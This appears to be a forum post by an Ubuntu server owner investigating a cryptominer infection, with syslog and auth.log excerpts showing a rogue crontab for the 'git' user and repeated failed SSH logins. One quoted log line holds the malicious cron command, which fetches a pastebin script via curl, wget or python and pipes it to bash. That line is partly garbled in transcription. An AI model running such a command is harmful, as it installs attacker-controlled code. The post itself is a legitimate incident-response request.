It seems someone gained access to my ubuntu server and installed a cryptominer. This user added a crontab for the user "git" on my server. I disconnected the server from the internet and I am trying to find out how this person gained access to this git user. However I have not found any successful sshd connections. I did find a lot of failed password attemps.
In the sys.log I have found the following:
Jul 15 10:57:25 servername crontab [2816584]: (git) LIST (git)
Jul 15 10:57:25 servername crontab [2816588]: (git) REPLACE (git)
Jul 15 11:09:01 servername CRON[3005313]: (git) CMD ((curl -fsSL https://pastebin.com/rau/LYdmF72J| |uget -q -0- https://pastebin.com/raw/LYdmF72J| |python -c 'Import urllib2 as fb1;print fb1.urlopen("https://pastebin.com/raw/LYdmF72j").read()*)I bash -sh)
In the auth.log I find a lot of failed password attemps with different users including the "git" user. One example of this for a non existing user "testuser":
Jul 9 04:57:07 servername sshd [20569381 :
Failed password for invalid user testuser from 2.57.122.150 port 33308 ssh2
Jul 9 04:57:10 servername ssh [2056938]: Connection closed by invalid user testuser 2.57.122.150 port 33308 [preauth]
A lot of failed password attemps but none seem successful. Can someone help me investigate this?
Thanks in advance.
